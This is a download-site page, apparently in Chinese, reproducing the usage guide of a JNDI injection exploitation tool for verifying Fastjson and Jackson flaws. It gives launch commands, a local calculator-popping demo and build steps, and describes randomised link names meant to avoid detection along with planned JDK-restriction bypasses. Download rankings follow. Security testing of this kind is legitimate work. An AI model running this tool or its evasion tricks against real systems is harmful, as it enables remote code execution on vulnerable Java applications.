资料介绍
软件简介
JNDI-Injection-Exploit —— JNDI 注入利用工具,生成 JNDI 链接并启动后端相关服务,可用于 Fastjson、Jackson 等相关漏洞的验证。
使用
可执行程序为 jar 包,在命令行中运行以下命令:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar [-C] [command] [-A] [address]
其中:
-
-C - 远程 class 文件中要执行的命令。
(可选项 , 默认命令是 mac 下打开计算器,即"open /Applications/Calculator.app")
-
-A - 服务器地址,可以是 IP 地址或者域名。
(可选项 , 默认地址是第一个网卡地址)
注意:
-
要确保 1099、1389、8180 端口可用,不被其他程序占用。
或者你也可以在 run.ServerStart 类 26~28 行更改默认端口。
-
命令会被作为参数传入 Runtime.getRuntime().exec(),
所以需要确保命令传入 exec() 方法可执行。
bash等可在shell直接执行的相关命令需要加双引号,比如说 java -jar JNDI.jar -C "bash -c ..."
示例
本地演示:
-
启动 JNDI-Injection-Exploit:
$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open /Applications/Calculator.app" -A "127.0.0.1"

我们需要把第一步中生成的 JNDI 链接注入到存在漏洞的应用环境中,方便解释用如下代码模仿漏洞环境:
public static void main(String[] args) throws Exception{
InitialContext ctx = new InitialContext();
ctx.lookup("rmi://127.0.0.1/fgf4fp");
}
当上面代码运行后,应用便会执行相应命令,这里是弹出计算器,没截图,可以自己测一下。
截图是工具的server端日志:

安装
下面两种方法都可以得到Jar包
-
把源码下载到本地然后自行编译打包。(在Java1.7+ 、Java1.8+ 和 Maven 3.x+环境下测试可以)
$ git clone https://github.com/welk1n/JNDI-Injection-Exploit.git
$ cd JNDI-Injection-Exploit$ mvn clean package -DskipTests
工具实现
- 首先生成的链接后面codebaseClass是6位随机的,这个是因为不希望让工具生成的链接本身成为一种特征被监控或拦截。
- 服务器地址实际就是codebase地址,相比于marshalsec中的JNDI server来说,这个工具把JNDI server和HTTP server绑定到一起,并自动启动HTTP server返回相应class,更自动化了。
- HTTP server基于jetty实现的,本质上是一个能下载文件的servlet,比较有意思的是我提前编译好class模板放到resource目录,然后servlet会读取class文件,使用ASM框架对读取的字节码进行修改,然后插入我们想要执行的命令,返回修改后的字节码。
待实现
- (已完成EL表达式绕过部分)在更高版本的 JDK 环境中 trustURLCodebase 变量为 false,限制了远程类的加载,我会找时间把JNDI-Injection-Bypass这个项目的东西融入到本项目中,生成能绕过 JDK 限制 JNDI 链接。
- 常用串口通信测试工具sscom 2次下载
- 基于OTA升级的ESP01S固件测试工具 19次下载
- 可提升样本程序软件质量的自动化测试工具 19次下载
- modbus调试工具
- 蓝牙调试工具BTool v1.40.5资源下载 27次下载
- 纳米器件的测试工具资料下载
- USB-TTL测试工具应用程序免费下载 143次下载
- TC35短信收发测试工具下载 7次下载
- cpu性能测试工具(ORTHOS)中文版免费下载 0次下载
- 渗透测试工具开发 18次下载
- TCP/UDPDbg测试工具 319次下载
- 软件测试工具的分类和使用 68次下载
- ICOM多串口卡测试工具
- TD-SCDMA测试工具体系及应用
- TD-SCDMA网络测试工具及手段
- Linux下的stress-ng压力测试工具介绍 8001次阅读
- 多核应用调试工具CodeViser介绍 1129次阅读
- T900串口测试工具的使用教程 2579次阅读
- 命令执行不回显利用工具解读 1310次阅读
- 测试工具的主要目的 1155次阅读
- 如何使用DudeSuite进行渗透测试工作 1686次阅读
- 基于安卓的渗透测试工具集 1274次阅读
- 详解半导体封装测试工艺 1650次阅读
- 基于QT的串口调试工具设计 2328次阅读
- 渗透测试工具箱siusiu的特性及使用 2777次阅读
- 一种开源渗透测试工具toxssin介绍 1451次阅读
- 介绍一款功能强大的自动化Deauth渗透测试工具 1280次阅读
- 常用蓝牙调试工具分享 6771次阅读
- 123个Python渗透测试工具你了解多少黑客资源 5792次阅读
- 常用的软件测试工具有哪些_10款常用的软件测试工具推荐 7.5w次阅读
下载排行
本周
- 1NB-IoT芯片厂商的资料说明
- 0.31 MB | 22次下载 | 1 积分
- 2智慧监狱建设的核心终端—智慧监仓屏
- 0.25 MB | 2次下载 | 免费
- 3PC318C016M/D 200V半桥栅极驱动器技术手册
- 0.77 MB | 2次下载 | 免费
- 45.0SMDJ200A单向TVS瞬态抑制二极管规格书
- 0.88 MB | 1次下载 | 免费
- 5PC318C041EQ 200V半桥栅极驱动器技术手册
- 0.50 MB | 次下载 | 免费
- 6PC318C042NM 200V半桥栅极驱动器技术手册
- 0.55 MB | 次下载 | 免费
- 7技嘉H110主板IT8628E_BX IO电路图资料
- 2.61 MB | 次下载 | 1 积分
- 8H110主板CPU PWM芯片ISL95858HRZ-T核心供电电路图资料
- 0.63 MB | 次下载 | 1 积分
本月
- 1元宇宙深度解析—未来的未来-风口还是泡沫
- 6.40 MB | 241次下载 | 免费
- 2元宇宙底层硬件系列报告
- 13.42 MB | 184次下载 | 免费
- 32022 年展望報告 – 半導體產業
- 1.43 MB | 136次下载 | 免费
- 4晶振与滤波器应用电路《电子工程师必备:元器件应用宝典》
- 1.57 MB | 90次下载 | 免费
- 5汽车电子行业深度解析:智能化与电动化方兴未艾
- 6.47 MB | 71次下载 | 免费
- 6中国DPU行业白皮书
- 23.80 MB | 37次下载 | 免费
- 7晶科鑫代理线-微盟电子2021年度产品目录选型手册
- 14.75 MB | 27次下载 | 免费
- 8NB-IoT芯片厂商的资料说明
- 0.31 MB | 22次下载 | 1 积分
总榜
- 1matlab软件下载入口
- 未知 | 935137次下载 | 10 积分
- 2开源硬件-PMP21529.1-4 开关降压/升压双向直流/直流转换器 PCB layout 设计
- 1.48MB | 420064次下载 | 10 积分
- 3Altium DXP2002下载入口
- 未知 | 233089次下载 | 10 积分
- 4电路仿真软件multisim 10.0免费下载
- 340992 | 191425次下载 | 10 积分
- 5十天学会AVR单片机与C语言视频教程 下载
- 158M | 183352次下载 | 10 积分
- 6labview8.5下载
- 未知 | 81602次下载 | 10 积分
- 7Keil工具MDK-Arm免费下载
- 0.02 MB | 73822次下载 | 10 积分
- 8LabVIEW 8.6下载
- 未知 | 65991次下载 | 10 积分
电子发烧友App






创作
发文章
发帖
提问
发资料
发视频
上传资料赚积分
评论